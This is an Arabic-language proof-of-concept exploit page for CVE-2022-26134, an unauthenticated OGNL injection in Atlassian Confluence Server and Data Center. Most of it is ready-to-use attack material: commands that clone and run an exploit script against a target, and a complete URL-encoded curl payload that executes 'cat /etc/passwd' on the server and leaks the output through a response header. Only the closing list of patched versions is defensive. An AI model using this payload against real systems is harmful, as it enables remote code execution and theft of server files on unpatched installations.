
استغلال إثبات المفهوم لـ CVE-2022-26134، ثغرة حقن OGNL دون مصادقة في Atlassian Confluence Server وData Center، مما يتيح تنفيذ التعليمات البرمجية عن بُعد.
في الإصدارات المتأثرة من Confluence Server وData Center، توجد ثغرة حقن OGNL تسمح لمهاجم غير مصادق بتنفيذ تعليمات برمجية عشوائية على مثيل Confluence Server أو Data Center.
git clone https://github.com/kh4sh3i/CVE-2022-26134
cd CVE-2022-26134
python3 cve-2022-26134.py https://target.com CMD
مثال باستخدام أمر CURL:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
بعد ذلك، سينعكس نتيجة الأمر في المعامل X-Cmd-Response في رأس الاستجابة.
الإصدارات التي تم إصدارها 7.4.17 و7.13.7 و7.14.3 و7.15.2 و7.16.4 و7.17.4 و7.18.1 تحتوي على إصلاح لهذه المشكلة.